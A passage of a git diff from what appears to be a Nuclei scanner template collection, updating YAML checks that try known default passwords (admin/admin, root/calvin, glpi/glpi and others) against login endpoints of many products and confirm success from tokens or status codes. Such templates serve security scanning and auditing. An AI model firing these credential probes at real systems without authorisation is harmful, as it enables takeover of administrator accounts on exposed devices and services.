+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + action=login&username={{username}}&password={{password}} + + payloads: + username: + - admin + password: + - admin + attack: pitchfork + matchers-condition: and + matchers: + - type: word + words: + - '"session.id"' + - '"success"' + condition: and + + - type: word + words: + - 'azkaban.browser.session.id' + - 'application/json' + condition: and + part: header + + - type: status + status: + - 200 + + extractors: + - type: kval + kval: + - azkaban.browser.session.id diff --git a/poc/default/canal-default-login-848.yaml b/poc/default/canal-default-login-848.yaml index a4c4a1b801..733d7d16f3 100644 --- a/poc/default/canal-default-login-848.yaml +++ b/poc/default/canal-default-login-848.yaml @@ -1,11 +1,16 @@ id: canal-default-login - info: name: Alibaba Canal Default Login author: pdteam + description: An Alibaba Canal default login was discovered. severity: high + reference: + - https://github.com/alibaba/canal/wiki/ClientAdapter + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: alibaba,default-login - requests: - raw: - | @@ -14,22 +19,21 @@ requests: Content-Type: application/json {"username":"{{user}}","password":"{{pass}}"} - attack: pitchfork payloads: user: - admin pass: - 123456 - matchers-condition: and matchers: - type: status status: - 200 - - type: word condition: and words: - 'data":{"token"' - '"code":20000' + +# Enhanced by mp on 2022/03/22 diff --git a/poc/default/cs141-default-login.yaml b/poc/default/cs141-default-login.yaml index 1a1610de31..a7c1b33bda 100644 --- a/poc/default/cs141-default-login.yaml +++ b/poc/default/cs141-default-login.yaml @@ -1,16 +1,12 @@ id: cs141-default-login info: - name: UPS Adapter CS141 SNMP Module Default Login + name: CS141 SNMP Module Default Login author: socketz severity: medium - description: UPS Adapter CS141 SNMP Module default login credentials were discovered. - reference: - - https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf - classification: - cwe-id: CWE-798 - metadata: - shodan-query: http.html:"CS141" + reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf tags: hiawatha,iot,default-login + metadata: + shodan-query: https://www.shodan.io/search?query=html%3A%22CS141%22 requests: - raw: - | @@ -46,5 +42,3 @@ requests: - type: kval kval: - accessToken - -# Enhanced by mp on 2022/03/07 diff --git a/poc/default/default-apache-test-page-6816.yaml b/poc/default/default-apache-test-page-6816.yaml index d76fd5ac60..ade74d648c 100644 --- a/poc/default/default-apache-test-page-6816.yaml +++ b/poc/default/default-apache-test-page-6816.yaml @@ -4,8 +4,8 @@ info: name: Apache HTTP Server Test Page author: dhiyaneshDk severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22Apache+HTTP+Server+Test+Page+powered+by+CentOS%22 + metadata: + shodan-query: http.title:"Apache HTTP Server Test Page powered by CentOS" tags: tech,apache requests: diff --git a/poc/default/default-centos-test-page-6826.yaml b/poc/default/default-centos-test-page-6826.yaml index 21c836f3cc..896f0ad6c1 100644 --- a/poc/default/default-centos-test-page-6826.yaml +++ b/poc/default/default-centos-test-page-6826.yaml @@ -1,17 +1,23 @@ id: default-centos-test-page + info: name: CentOs-WebPanel Test Page author: dhiyaneshDk severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22HTTP+Server+Test+Page+powered+by+CentOS-WebPanel.com%22 + metadata: + max-request: 1 + shodan-query: http.title:"HTTP Server Test Page powered by CentOS-WebPanel.com" tags: tech,centos -requests: + +http: - method: GET path: - '{{BaseURL}}' + matchers: - type: word words: - "HTTP Server Test Page powered by CentOS-WebPanel.com" part: body + +# digest: 490a0046304402203469f2a4a3465618ba629eb99f7f49193eca7b9a5eacba23ff84a44ada460a8202201ed4a6932ca791598a736d32c70c4c6b14278c05046ba7dd36094d99da764e91:922c64590222798bb761d5b6d8e72950 diff --git a/poc/default/default-django-page-6841.yaml b/poc/default/default-django-page-6841.yaml index 450d7e265c..cf3cf5a7f7 100644 --- a/poc/default/default-django-page-6841.yaml +++ b/poc/default/default-django-page-6841.yaml @@ -3,8 +3,8 @@ info: name: Django Default Page author: dhiyaneshDk severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22The+install+worked+successfully%21+Congratulations%21%22 + metadata: + shodan-query: http.title:"The install worked successfully! Congratulations!" tags: tech,django requests: - method: GET diff --git a/poc/default/default-iis7-page.yaml b/poc/default/default-iis7-page.yaml index b62a6ed622..30e3de8e56 100644 --- a/poc/default/default-iis7-page.yaml +++ b/poc/default/default-iis7-page.yaml @@ -1,17 +1,18 @@ id: default-iis7-page + info: - name: IIS-7 Default Page - author: dhiyaneshDk + name: IIS Error page on css all languages + author: yavolo severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22IIS7%22 tags: tech,iis + reference: https://github.com/yavolo/nuclei-templates/ + requests: - method: GET path: - - '{{BaseURL}}' + - '{{BaseURL}}/does-not-exist-iis-404' matchers: - - type: word - words: - - "IIS7" + - type: regex + regex: + - "#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:" part: body diff --git a/poc/default/default-openresty.yaml b/poc/default/default-openresty.yaml index 401ac8779f..cfe73c1a3a 100644 --- a/poc/default/default-openresty.yaml +++ b/poc/default/default-openresty.yaml @@ -1,12 +1,11 @@ id: default-openresty - info: name: OpenResty Default Page author: dhiyaneshDk severity: info - tags: tech,openrestry - reference: https://www.shodan.io/search?query=http.title%3A%22Welcome+to+OpenResty%21%22 - + reference: + - https://www.shodan.io/search?query=http.title%3A%22Welcome+to+OpenResty%21%22 + tags: tech,openresty requests: - method: GET path: diff --git a/poc/default/default-oracle-application-page-6891.yaml b/poc/default/default-oracle-application-page-6891.yaml index e96a481921..263c5493f5 100644 --- a/poc/default/default-oracle-application-page-6891.yaml +++ b/poc/default/default-oracle-application-page-6891.yaml @@ -1,10 +1,12 @@ id: default-oracle-application-page + info: name: Oracle Application Server Containers author: dhiyaneshDk severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Application+Server+Containers%22 tags: tech,oracle + reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Application+Server+Containers%22 + requests: - method: GET path: diff --git a/poc/default/default-redhat-test-page-6903.yaml b/poc/default/default-redhat-test-page-6903.yaml index b46474eadd..518c8f746f 100644 --- a/poc/default/default-redhat-test-page-6903.yaml +++ b/poc/default/default-redhat-test-page-6903.yaml @@ -1,17 +1,23 @@ id: default-redhat-test-page + info: name: Red Hat Enterprise Linux Test Page author: dhiyaneshDk severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22Test+Page+for+the+Apache+HTTP+Server+on+Red+Hat+Enterprise+Linux%22 + metadata: + max-request: 1 + shodan-query: http.title:"Test Page for the Apache HTTP Server on Red Hat Enterprise Linux" tags: tech,redhat -requests: + +http: - method: GET path: - '{{BaseURL}}' + matchers: - type: word words: - "Test Page for the Apache HTTP Server on Red Hat Enterprise Linux" part: body + +# digest: 4a0a0047304502200f10ec858e5a0347954ce4a1aed87801cc3cb17fa2446ad2a57f18b51344789b0221008347e4e3282fc734b53c8e559998af04e319cc89a9952e6479cabf9622008681:922c64590222798bb761d5b6d8e72950 diff --git a/poc/default/dell-idrac-default-login-6943.yaml b/poc/default/dell-idrac-default-login-6943.yaml index 09fa2b2673..d4e68fe296 100644 --- a/poc/default/dell-idrac-default-login-6943.yaml +++ b/poc/default/dell-idrac-default-login-6943.yaml @@ -4,28 +4,24 @@ info: author: kophjager007 severity: high tags: dell,idrac,default-login -requests: - - raw: - - | - POST /data/login HTTP/1.1 - Host: {{Hostname}} - user={{username}}&password={{password}} - payloads: - username: - - root - password: - - calvin - attack: pitchfork +requests: + - method: POST + cookie-reuse: true + path: + - "{{BaseURL}}/data/login" + body: "user=root&password=calvin" headers: - Content-Type: "application/x-www-form-urlencode" + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 + Content-Type: application/x-www-form-urlencode Referer: "{{BaseURL}}/login.html" - cookie-reuse: true + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - - '0' + - 0 diff --git a/poc/default/dell-idrac9-default-login.yaml b/poc/default/dell-idrac9-default-login.yaml index 9317d085ee..d60325405b 100644 --- a/poc/default/dell-idrac9-default-login.yaml +++ b/poc/default/dell-idrac9-default-login.yaml @@ -1,22 +1,26 @@ id: dell-idrac9-default-login + info: name: DELL iDRAC9 Default Login author: kophjager007,milo2012 severity: high tags: dell,idrac,default-login + requests: - raw: - | POST /sysmgmt/2015/bmc/session HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 - Accept: application/json, text/plain, */* - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - User: "root" - Password: "calvin" - Content-Length: 0 - Connection: close + User: "{{username}}" + Password: "{{password}}" + + payloads: + username: + - root + password: + - calvin + attack: pitchfork + matchers-condition: and matchers: - type: status @@ -24,6 +28,7 @@ requests: - 201 - 200 condition: or + - type: word part: body words: diff --git a/poc/default/druid-default-login.yaml b/poc/default/druid-default-login.yaml index 4dd778392e..1a787c7ba6 100644 --- a/poc/default/druid-default-login.yaml +++ b/poc/default/druid-default-login.yaml @@ -1,14 +1,12 @@ id: druid-default-login - info: name: Apache Druid Default Login author: pikpikcu severity: high description: Apache Druid default login information (admin/admin) was discovered. - tags: druid,default-login classification: cwe-id: CWE-798 - + tags: druid,default-login requests: - raw: - | @@ -16,27 +14,22 @@ requests: Host: {{Hostname}} loginUsername={{username}}&loginPassword={{password}} - - | POST /submitLogin HTTP/1.1 Host: {{Hostname}} loginUsername={{username}}&loginPassword={{password}} - payloads: username: - admin password: - admin attack: pitchfork - matchers-condition: and matchers: - - type: status status: - 200 - - type: regex regex: - "^success$" diff --git a/poc/default/emqx-default-login-7222.yaml b/poc/default/emqx-default-login-7222.yaml index 5b55f228e5..792fb8c64b 100644 --- a/poc/default/emqx-default-login-7222.yaml +++ b/poc/default/emqx-default-login-7222.yaml @@ -1,18 +1,17 @@ id: emqx-default-login - info: name: Emqx Default Admin Login author: For3stCo1d severity: high description: Emqx default admin credentials were discovered. + metadata: + shodan-query: 'http.favicon.hash:"-670975485"' classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - metadata: - shodan-query: http.favicon.hash:"-670975485" tags: emqx,default-login - requests: - raw: - | @@ -21,14 +20,12 @@ requests: Content-Type: application/x-www-form-urlencoded {"username":"{{user}}","password":"{{pass}}"} - attack: pitchfork payloads: user: - admin pass: - public - matchers: - type: dsl dsl: diff --git a/poc/default/exacqvision-default-login-7277.yaml b/poc/default/exacqvision-default-login-7277.yaml index 1109a7cae7..872006f74d 100644 --- a/poc/default/exacqvision-default-login-7277.yaml +++ b/poc/default/exacqvision-default-login-7277.yaml @@ -4,11 +4,10 @@ info: author: ELSFA7110 severity: high description: ExacqVision Web Service default login credentials (admin/admin256) were discovered. - reference: - - https://cdn.exacq.com/auto/manspec/files_2/exacqvision_user_manuals/web_service/exacqVision_Web_Service_Configuration_User_Manual_(version%208.8).pdf + tags: exacqvision,default-login + reference: https://cdn.exacq.com/auto/manspec/files_2/exacqvision_user_manuals/web_service/exacqVision_Web_Service_Configuration_User_Manual_(version%208.8).pdf classification: cwe-id: cwe-798 - tags: exacqvision,default-login requests: - raw: - | diff --git a/poc/default/frp-default-login-7557.yaml b/poc/default/frp-default-login-7557.yaml index 2dc240d633..601e60ca39 100644 --- a/poc/default/frp-default-login-7557.yaml +++ b/poc/default/frp-default-login-7557.yaml @@ -1,35 +1,34 @@ id: frp-default-login - info: - name: Frp Default Login + name: FRP Default Login author: pikpikcu severity: high + description: FRP default login credentials were discovered. tags: frp,default-login reference: https://github.com/fatedier/frp/issues/1840 - + classification: + cwe-id: CWE-798 requests: - raw: - | GET /api/proxy/tcp HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} - payloads: username: - admin password: - admin attack: pitchfork - matchers-condition: and matchers: - - type: word words: - "proxies" part: body condition: and - - type: status status: - 200 + +# Enhanced by mp on 2022/03/03 diff --git a/poc/default/glpi-default-login-7732.yaml b/poc/default/glpi-default-login-7732.yaml index 1e3a558f53..63857480c0 100644 --- a/poc/default/glpi-default-login-7732.yaml +++ b/poc/default/glpi-default-login-7732.yaml @@ -1,24 +1,18 @@ id: glpi-default-login - info: name: GLPI Default Login author: andysvints severity: high + tags: glpi,default-login description: GLPI default login credentials were discovered. GLPI is an ITSM software tool that helps you plan and manage IT changes. This template checks if a default super admin account (glpi/glpi) is enabled. - reference: - - https://glpi-project.org/ + reference: https://glpi-project.org/ classification: cwe-id: CWE-798 - tags: glpi,default-login - metadata: - max-request: 2 - -http: +requests: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - - | POST /front/login.php HTTP/1.1 Host: {{Hostname}} @@ -27,14 +21,12 @@ http: Referer: {{BaseURL}} {{name}}={{user}}&{{password}}={{pass}}&auth=local&submit=Submit&_glpi_csrf_token={{token}} - attack: pitchfork payloads: user: - glpi pass: - glpi - extractors: - type: regex name: token @@ -43,7 +35,6 @@ http: group: 1 regex: - "hidden\" name=\"_glpi_csrf_token\" value=\"([0-9a-z]+)\"" - - type: regex name: name part: body @@ -51,7 +42,6 @@ http: group: 1 regex: - "type=\"text\" name=\"([0-9a-z]+)\" id=\"login_name\" required=\"required\"" - - type: regex name: password part: body @@ -59,14 +49,12 @@ http: group: 1 regex: - "type=\"password\" name=\"([0-9a-z]+)\" id=\"login_password\" required=\"required\"" - cookie-reuse: true matchers-condition: and matchers: - type: word words: - 'GLPI - Standard Interface' - - type: status status: - 200 diff --git a/poc/default/grafana-default-login.yaml b/poc/default/grafana-default-login.yaml index c6f47b7acd..bb4f3051fc 100644 --- a/poc/default/grafana-default-login.yaml +++ b/poc/default/grafana-default-login.yaml @@ -2,19 +2,11 @@ id: grafana-default-login info: name: Grafana Default Login - author: pdteam + author: d3sca severity: high - description: Grafana default admin login credentials were detected. - reference: - - https://grafana.com/docs/grafana/latest/administration/configuration/#disable_brute_force_login_protection - - https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page - - https://github.com/grafana/grafana/issues/14755 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 tags: grafana,default-login + requests: - raw: - | @@ -40,16 +32,14 @@ requests: matchers: - type: word words: - - "grafana_session" # Login cookie + - "grafana_session" # Login cookie part: header - type: word part: body words: - - "Logged in" # Logged in keyword + - "Logged in" # Logged in keyword - type: status status: - 200 - -# Enhanced by mp on 2022/03/10 diff --git a/poc/default/huawei-hg532e-default-router-login-8064.yaml b/poc/default/huawei-hg532e-default-router-login-8064.yaml index e29e927d84..2ebc7ab348 100644 --- a/poc/default/huawei-hg532e-default-router-login-8064.yaml +++ b/poc/default/huawei-hg532e-default-router-login-8064.yaml @@ -1,16 +1,17 @@ id: huawei-HG532e-default-login info: name: Huawei HG532e Default Credential + description: Huawei HG532e default admin credentials were discovered. author: pussycat0x severity: high - description: Huawei HG532e default admin credentials were discovered. + metadata: + shodan-query: http.html:"HG532e" + tags: default-login,huawei classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - metadata: - shodan-query: http.html:"HG532e" - tags: default-login,huawei requests: - raw: - | diff --git a/poc/default/hue-default-credential-8081.yaml b/poc/default/hue-default-credential-8081.yaml index 21ca20ec17..f401f97a57 100644 --- a/poc/default/hue-default-credential-8081.yaml +++ b/poc/default/hue-default-credential-8081.yaml @@ -1,22 +1,19 @@ id: hue-default-credential - info: name: Cloudera Hue Default Admin Login author: For3stCo1d severity: high description: Cloudera Hue default admin credentials were discovered. - reference: - - https://github.com/cloudera/hue + reference: https://github.com/cloudera/hue + metadata: + shodan-query: title:"Hue - Welcome to Hue" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - metadata: - max-request: 8 - shodan-query: title:"Hue - Welcome to Hue" tags: hue,default-login,oss,cloudera - -http: +requests: - raw: - | GET /hue/accounts/login?next=/ HTTP/1.1 @@ -27,7 +24,6 @@ http: Content-Type: application/x-www-form-urlencoded csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username={{user}}&password={{pass}}&next=%2F - attack: pitchfork payloads: user: @@ -41,7 +37,6 @@ http: - hadoop - cloudera cookie-reuse: true - extractors: - type: regex name: csrfmiddlewaretoken @@ -52,18 +47,16 @@ http: - name='csrfmiddlewaretoken' value='(.+?)' req-condition: true stop-at-first-match: true - matchers-condition: and matchers: - type: dsl dsl: - contains(tolower(body_1), 'welcome to hue') - - contains(tolower(header_2), 'csrftoken=') - - contains(tolower(header_2), 'sessionid=') + - contains(tolower(all_headers_2), 'csrftoken=') + - contains(tolower(all_headers_2), 'sessionid=') condition: and - - type: status status: - 302 -# digest: 4b0a00483046022100ab2304e0e2a848bbb9420d4e07e1d72d6f404762a010aa7ceaebeee04c0d59e7022100ccaae94d492ac6eb9aa70f8b99e0c8bd207663ce90a74ffff0c3aff1da463798:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/28 diff --git a/poc/default/ibm-mqseries-default-login-8107.yaml b/poc/default/ibm-mqseries-default-login-8107.yaml index 78424d3229..765cde99f4 100644 --- a/poc/default/ibm-mqseries-default-login-8107.yaml +++ b/poc/default/ibm-mqseries-default-login-8107.yaml @@ -1,44 +1,46 @@ -id: ibm-mqseries-default-login - -info: - name: IBM MQSeries web console default login - author: righettod - severity: high - description: The remote host is running IBM MQ and REST API and is using default credentials. An unauthenticated, remote attacker can exploit this gain privileged or administrator access to the system. - tags: ibm,default-login - reference: - - https://github.com/ibm-messaging/mq-container/blob/master/etc/mqm/mq.htpasswd - - https://vulners.com/nessus/IBM_MQ_DEFAULT_CREDENTIALS.NASL - -requests: - - raw: - - | - POST /ibmmq/console/j_security_check HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Referer: {{RootURL}}/ibmmq/console/login.html - - j_username={{username}}&j_password={{password}} - - attack: pitchfork - payloads: - username: - - admin - - app - - mqadmin - password: - - passw0rd - - passw0rd - - mqadmin - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "LtpaToken2_" - - - type: status - status: - - 302 \ No newline at end of file +id: ibm-mqseries-default-login +info: + name: IBM MQSeries Web Console Default Login + author: righettod + severity: high + description: IBM MQ and REST API default admin credentials were discovered. An unauthenticated, remote attacker can exploit this gain privileged or administrator access to the system. + tags: ibm,default-login + reference: + - https://github.com/ibm-messaging/mq-container/blob/master/etc/mqm/mq.htpasswd + - https://vulners.com/nessus/IBM_MQ_DEFAULT_CREDENTIALS.NASL + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 +requests: + - raw: + - | + POST /ibmmq/console/j_security_check HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{RootURL}}/ibmmq/console/login.html + + j_username={{username}}&j_password={{password}} + attack: pitchfork + payloads: + username: + - admin + - app + - mqadmin + password: + - passw0rd + - passw0rd + - mqadmin + matchers-condition: and + matchers: + - type: word + part: header + words: + - "LtpaToken2_" + - type: status + status: + - 302 + +# Enhanced by mp on 2022/03/10 diff --git a/poc/default/idemia-biometrics-default-login.yaml b/poc/default/idemia-biometrics-default-login.yaml index 1a7ffa1347..edd899c586 100644 --- a/poc/default/idemia-biometrics-default-login.yaml +++ b/poc/default/idemia-biometrics-default-login.yaml @@ -2,10 +2,15 @@ id: idemia-biometrics-default-login info: name: IDEMIA BIOMetrics Default Login author: Techryptic (@Tech) - severity: high - description: Default Login of password=12345 on IDEMIA BIOMetrics application. + severity: medium + description: IDEMIA BIOMetrics application default login credentials were discovered. reference: https://www.google.com/search?q=idemia+password%3D+"12345" tags: idemia,biometrics,default-login + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cve-id: + cwe-id: CWE-522 requests: - raw: - | @@ -31,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/poc/default/iptime-default-login-8192.yaml b/poc/default/iptime-default-login-8192.yaml index a03c2cf675..d6a42f5490 100644 --- a/poc/default/iptime-default-login-8192.yaml +++ b/poc/default/iptime-default-login-8192.yaml @@ -1,16 +1,11 @@ id: iptime-default-login + info: name: ipTIME Default Login author: gy741 severity: high - description: ipTIME default admin credentials were discovered. - reference: - - https://www.freewebtools.com/IPTIME/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 tags: iptime,default-login + requests: - raw: - | @@ -19,17 +14,20 @@ requests: Referer: {{BaseURL}}/sess-bin/login_session.cgi username={{username}}&passwd={{password}} + payloads: username: - admin password: - admin attack: pitchfork + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "setCookie" @@ -37,5 +35,3 @@ requests: - "login.cgi" part: body condition: and - -# Enhanced by mp on 2022/03/10 diff --git a/poc/default/jinher-oa-default-login-8311.yaml b/poc/default/jinher-oa-default-login-8311.yaml index 84e1e87e9b..6be5f643d2 100644 --- a/poc/default/jinher-oa-default-login-8311.yaml +++ b/poc/default/jinher-oa-default-login-8311.yaml @@ -1,15 +1,11 @@ id: jinher-oa-default-login info: - name: Jinher-OA C6 - Default Admin Discovery + name: Jinher oa C6 Default Password author: ritikchaddha severity: high - description: Jinher-OA C6 default admin credentials were discovered. + description: Jinher-OA C6 default administrator account credential. reference: - https://github.com/nu0l/poc-wiki/blob/main/%E9%87%91%E5%92%8COA-C6-default-password.md - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 tags: jinher,default-login requests: - raw: @@ -40,5 +36,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/07/15 diff --git a/poc/default/jmx-default-login-8354.yaml b/poc/default/jmx-default-login-8354.yaml index ddf2035a6c..a0f36dca9e 100644 --- a/poc/default/jmx-default-login-8354.yaml +++ b/poc/default/jmx-default-login-8354.yaml @@ -1,4 +1,5 @@ id: jmx-default-login + info: name: JBoss JMX Console Weak Credential Discovery author: paradessia @@ -11,12 +12,20 @@ info: cvss-score: 8.3 cwe-id: CWE-522 tags: jboss,jmx,default-login -requests: + metadata: + max-request: 28 + +http: - raw: + - | + GET /jmx-console/ HTTP/1.1 + Host: {{Hostname}} + - | GET /jmx-console/ HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(user + ':' + pass)}} + attack: clusterbomb payloads: user: @@ -30,13 +39,16 @@ requests: - 123456789 - 123qwe - root + + req-condition: true matchers-condition: and matchers: + - type: dsl + dsl: + - "!contains(body_1, 'JMImplementation') && contains(body_2, 'JMImplementation')" + - type: status status: - 200 - - type: word - words: - - 'JMImplementation' # Enhanced by mp on 2022/03/10 diff --git a/poc/default/lighttpd-default-8627.yaml b/poc/default/lighttpd-default-8627.yaml index 9038df8198..deeb3bf63f 100644 --- a/poc/default/lighttpd-default-8627.yaml +++ b/poc/default/lighttpd-default-8627.yaml @@ -1,19 +1,27 @@ id: lighttpd-default + info: name: lighttpd Default Page author: dhiyaneshDK severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Powered+by+lighttpd%22 - tags: tech -requests: + metadata: + max-request: 1 + shodan-query: http.title:"Powered by lighttpd" + tags: tech,lighttpd + +http: - method: GET path: - '{{BaseURL}}' + matchers-condition: and matchers: - type: word words: - "Powered by lighttpd" + - type: status status: - 200 + +# digest: 490a0046304402207bfb53ff74c8a5d2164ebdb801345b5d3b8f3888967a5ecdc711bd142f5f7bcd02203e2391d3e9dff05fd2ed8001470a60b1ac2fc4dfd7c61e2039b6cdd4263652fd:922c64590222798bb761d5b6d8e72950 diff --git a/poc/default/lutron-iot-default-login.yaml b/poc/default/lutron-iot-default-login.yaml index 71fd122838..9f80864342 100644 --- a/poc/default/lutron-iot-default-login.yaml +++ b/poc/default/lutron-iot-default-login.yaml @@ -5,6 +5,7 @@ info: reference: https://www.lutron.com author: geeknik severity: high + tags: iot,default-login,lutron,panel requests: - method: GET @@ -19,10 +20,12 @@ requests: - ">DeviceIP" - ">Get Database Info as XML" condition: and + - type: word part: header words: - "text/html" + - type: status status: - 200 diff --git a/poc/default/mantisbt-default-credential-8779.yaml b/poc/default/mantisbt-default-credential-8779.yaml index 329e2e16cb..17ceea9753 100644 --- a/poc/default/mantisbt-default-credential-8779.yaml +++ b/poc/default/mantisbt-default-credential-8779.yaml @@ -2,52 +2,45 @@ id: mantisbt-default-credential info: name: MantisBT Default Admin Login - author: YashVardhanTripathi + author: For3stCo1d severity: high - description: A MantisBT default admin login dsicovery template. - -http: - - method: GET - path: - - "{{BaseURL}}/mantis/login_page.php" - - redirects: true - - extractors: - - type: regex - name: somesome - group: 1 - part: header - regex: - - "PHPSESSID=([a-zA-Z0-9]+);" + description: A MantisBT default admin login was discovered. + reference: + - https://mantisbt.org/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + shodan-query: title:"MantisBT" + tags: mantisbt,default-login +requests: - raw: - | - POST /mantis/login_password_page.php HTTP/1.1 + POST /login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Cookie: MANTIS_secure_session=1; PHPSESSID={{somesome}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate, br - Connection: close - Upgrade-Insecure-Requests: 1 - return=index.php&username={{pewpew}}&password={{password}}&secure_session=on + return=index.php&username={{user}}&password={{pass}} + attack: pitchfork payloads: - pewpew: + user: - administrator - password: + pass: - root - attack: pitchfork + matchers-condition: and matchers: + - type: dsl + dsl: + - contains(tolower(all_headers), 'mantis_secure_session') + - contains(tolower(all_headers), 'mantis_string_cookie') + condition: and + - type: status status: - 302 - - type: regex - part: header - regex: - - "Location: .*?/login_cookie_test.php\\?return=account_page.php" + +# Enhanced by mp on 2022/03/22 diff --git a/poc/default/mofi4500-default-login.yaml b/poc/default/mofi4500-default-login.yaml index 31203a5587..e010d8ca58 100644 --- a/poc/default/mofi4500-default-login.yaml +++ b/poc/default/mofi4500-default-login.yaml @@ -3,14 +3,15 @@ info: name: MOFI4500-4GXeLTE-V2 Default Login author: pikpikcu severity: high + tags: mofi,default-login description: Mofi Network MOFI4500-4GXELTE wireless router default admin credentials were discovered. reference: - https://www.cleancss.com/router-default/Mofi_Network/MOFI4500-4GXELTE classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - tags: mofi,default-login requests: - raw: - | diff --git a/poc/default/nagios-default-login.yaml b/poc/default/nagios-default-login.yaml index f0af19260e..e1982ba865 100644 --- a/poc/default/nagios-default-login.yaml +++ b/poc/default/nagios-default-login.yaml @@ -11,7 +11,6 @@ requests: GET /nagios/side.php HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} - payloads: username: - nagiosadmin @@ -20,13 +19,11 @@ requests: - nagiosadmin - nagiosxi attack: pitchfork - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - 'Current Status' diff --git a/poc/default/netsus-default-login.yaml b/poc/default/netsus-default-login.yaml index adee76136b..95c1ae4a93 100644 --- a/poc/default/netsus-default-login.yaml +++ b/poc/default/netsus-default-login.yaml @@ -3,8 +3,13 @@ info: name: NetSUS Server Default Login author: princechaddha severity: high + description: NetSUS Server default admin credentials were discovered. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: - shodan-query: 'http.title:"NetSUS Server Login"' + shodan-query: http.title:"NetSUS Server Login" tags: netsus,default-login requests: - raw: @@ -31,3 +36,5 @@ requests: - type: status status: - 302 + +# Enhanced by mp on 2022/03/10 diff --git a/poc/default/nexus-default-password.yaml b/poc/default/nexus-default-password.yaml index 06f9b87d3e..8cde0421ba 100644 --- a/poc/default/nexus-default-password.yaml +++ b/poc/default/nexus-default-password.yaml @@ -1,9 +1,11 @@ id: nexus-default-password + info: name: Nexus Default Password author: pikpikcu severity: high tags: nexus,default-login + requests: - raw: - | @@ -15,6 +17,7 @@ requests: Connection: close username=YWRtaW4%3D&password=YWRtaW4xMjM%3D + matchers-condition: and matchers: - type: status diff --git a/poc/default/nps-default-password.yaml b/poc/default/nps-default-password.yaml index d3ade09bfa..64d356618f 100644 --- a/poc/default/nps-default-password.yaml +++ b/poc/default/nps-default-password.yaml @@ -1,11 +1,9 @@ id: nps-default-password - info: name: NPS Default Password author: pikpikcu severity: high tags: nps,default-login - requests: - method: POST path: @@ -14,7 +12,6 @@ requests: headers: Content-Type: application/x-www-form-urlencoded Referer: "{{Hostname}}/login/index" - matchers-condition: and matchers: - type: word diff --git a/poc/default/octobercms-default-login.yaml 